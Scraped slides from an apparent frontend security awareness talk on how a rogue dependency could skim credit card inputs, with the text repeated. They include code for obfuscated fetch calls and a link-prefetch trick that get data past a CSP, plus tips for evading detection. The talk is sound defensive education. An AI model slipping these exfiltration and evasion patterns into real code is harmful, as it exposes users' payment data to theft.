Be careful!!!

How to steel you credit card?

Search for inputs with it)

XSS, CSRF, SQL-injection

What dependencies do you have?

Don't you have it now?

I'll see it in devtools

https://jsfiddle.net/gcdfs3oo/

https://jsfiddle.net/evnrorea/

I'll see it in HTTP monitoring tool?

Just send an information at night)

Make it like this:

https://www.google-analytics.com/collect?v=1&tid=UA-90567577-1&cid=cn9n6fhuu2u8&t=event&ec=CookieConsentBar&ea=www.google.com

I'll see it on github

Store pure version on github

I'll see it in node_modules

const i = 'gfudi';
const k = s => s.split('')
                .map(c => String.fromCharCode(c.charCodeAt() - 1))
                .join('');
self[k(i)](urlWithYourPreciousData);

self['\u0066\u0065\u0074\u0063\u0068'](...)

I have a CSP

const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);

https://w3c.github.io/webappsec-csp/#directive-prefetch-src

Be careful!!!

How to steel you credit card?

Search for inputs with it)

XSS, CSRF, SQL-injection

What dependencies do you have?

Don't you have it now?

I'll see it in devtools

I'll see it in HTTP monitoring tool?

Just send an information at night)

I have a CSP

https://w3c.github.io/webappsec-csp/#directive-prefetch-src

Current state of CSP

What to do?

Don't use other dependencies on important pages?

Frontend security

Frontend security

Vladimir

Be careful!!!

How to steel you credit card?

Search for inputs with it)

XSS, CSRF, SQL-injection

What dependencies do you have?

Don't you have it now?

I'll see it in devtools

I'll see it in HTTP monitoring tool?

Just send an information at night)

I have a CSP

https://w3c.github.io/webappsec-csp/#directive-prefetch-src

Current state of CSP

What to do?

Don't use other dependencies on important pages?

Frontend security

More from Vladimir